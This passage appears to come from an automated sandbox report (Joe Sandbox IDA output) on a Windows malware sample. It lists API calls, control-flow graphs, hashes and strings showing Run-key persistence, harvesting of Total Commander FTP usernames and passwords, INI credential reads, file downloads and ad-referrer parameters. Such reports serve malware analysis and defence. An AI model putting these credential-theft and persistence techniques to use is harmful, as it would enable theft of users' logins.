                                                                                                                                                                                                    • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,75A8E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                                                                                                                                                                                                    • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Open$CloseQueryValue
                                                                                                                                                                                                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                  • API String ID: 3546245721-4228964922
                                                                                                                                                                                                  • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                                                                                                                                                                                                  • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
                                                                                                                                                                                                  • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                                                                                                                                                                                                  • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CharLower$CommandFileLineModuleName
                                                                                                                                                                                                  • String ID: /nomove
                                                                                                                                                                                                  • API String ID: 1338073227-1111986840
                                                                                                                                                                                                  • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                                                                                                                                                                                                  • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 96 407727-407751 call 40d5b0 GetModuleFileNameW 99 407753-40776b call 4075d4 96->99 100 40776d-40776e 96->100 105 4077e1-4077ea 99->105 102 407774-407797 ExpandEnvironmentStringsW call 4075d4 100->102 106 40779c-4077a0 102->106 107 4077a2-4077a5 106->107 108 4077eb-4077ee 106->108 110 4077b7-4077ba 107->110 111 4077a7-4077b5 GetLastError 107->111 109 4077e0 108->109 109->105 113 4077d2-4077dc 110->113 114 4077bc-4077c8 GetLastError 110->114 112 4077ca-4077cf call 40a786 111->112 112->113 113->102 115 4077de 113->115 114->112 115->109
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,74DF0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000004), ref: 004077A9
                                                                                                                                                                                                    • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                                                                                                                                                                                                    • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1536607067-0
                                                                                                                                                                                                  • Opcode ID: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                                                                                                                                                                                                  • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 118 4077f0-407829 call 40d530 CreateProcessW
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _memset.LIBCMT ref: 00407800
                                                                                                                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateProcess_memset
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1177741608-0
                                                                                                                                                                                                  • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                                                                                                                                                                                                  • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 128 4069c0-4069fc RegQueryValueExW RegCloseKey
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,75A8E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                                                                                                                                                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseQueryValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3356406503-0
                                                                                                                                                                                                  • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                                                                                                                                                                                                  • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 262 4039ea-403a14 HeapAlloc 263 403bba-403bbe 262->263 264 403a1a-403a30 GetPrivateProfileStringW 262->264 265 403bb3-403bb9 call 40be3a 264->265 266 403a36-403a42 call 40c475 264->266 265->263 266->265 271 403a48-403a5e HeapAlloc 266->271 271->265 272 403a64-403ac3 call 405511 * 5 271->272 283 403ac8-403ad7 StrStrIW 272->283 284 403b93-403ba3 call 40c495 283->284 285 403add-403aec StrStrIW 283->285 284->283 291 403ba9-403bb2 call 40be3a 284->291 285->284 286 403af2-403b03 GetPrivateProfileStringW 285->286 286->284 288 403b09-403b24 GetPrivateProfileStringW 286->288 288->284 290 403b26-403b3a GetPrivateProfileStringW 288->290 290->284 292 403b3c-403b47 call 403877 290->292 291->265 292->284 297 403b49-403b7b call 405511 call 40c3f9 292->297 302 403b90 297->302 303 403b7d-403b8b call 40c00b 297->303 302->284 303->302 306 403b8d 303->306 306->302
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                                                                                                                                                                                                  • StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                                                                                                                                                                                                  • StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: PrivateProfileString$AllocHeap
                                                                                                                                                                                                  • String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
                                                                                                                                                                                                  • API String ID: 2479592106-2015850556
                                                                                                                                                                                                  • Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                                                                                                                                                                                                  • Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C
                                                                                                                                                                                                    • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 004032E5
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 004032ED
                                                                                                                                                                                                  • VirtualProtect.KERNEL32(75C50B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
                                                                                                                                                                                                  • VirtualProtect.KERNEL32(75C50B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                                                                                                                                                                                                  • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                                                                                                                                                                                                  • API String ID: 3066332896-2664446222
                                                                                                                                                                                                  • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                                                                                                                                                                                                  • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                                                                                                                                                                                                  • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                                                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00408342
                                                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00408377
                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004083B9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                                                                                                                                                                                                  • String ID: .$.$.8@$.8@$@@
                                                                                                                                                                                                  • API String ID: 2348139788-3828113974
                                                                                                                                                                                                  • Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                                                                                                                                                                                                  • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                                                                                                                                                                                                  • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: PrivateProfile$String$AllocHeap$CombinePath
                                                                                                                                                                                                  • String ID: ftp://%s:%s@%s:%u$pass$port$user
                                                                                                                                                                                                  • API String ID: 3432043379-2696999094
                                                                                                                                                                                                  • Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                                                                                                                                                                                                  • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,74DF0F00), ref: 00407043
                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00407079
                                                                                                                                                                                                  • SetEndOfFile.KERNEL32(00000000), ref: 0040708F
                                                                                                                                                                                                  • InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004070BB
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3711279109-0
                                                                                                                                                                                                  • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                                                                                                                                                                                                  • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: &condition_id=$&kwtype=$&real_refer=%s$&ref=%s$&ref=%s&real_refer=%s$0$0$0$0
                                                                                                                                                                                                  • API String ID: 0-2992689389
                                                                                                                                                                                                  • Opcode ID: f118b9fb71cfb78005f5506091eb1ec0394b7ad0f1bd3af93ebbb6a5fa6d69e0
                                                                                                                                                                                                  • Instruction ID: e592e17ffd072e5ed7288f56bd6294cd549ee2c695a1c784d027d9705cc039a8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f118b9fb71cfb78005f5506091eb1ec0394b7ad0f1bd3af93ebbb6a5fa6d69e0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2F1E272810118AADB14EB61DC919EF737EEF01304F5044BBFA09B62D1E7789E858F99
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                                                                                                                                                                                                  • GetLocalTime.KERNEL32(00000000), ref: 004074B3
                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3777474486-0
                                                                                                                                                                                                  • Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                                                                                                                                                                                                  • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 004072E3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
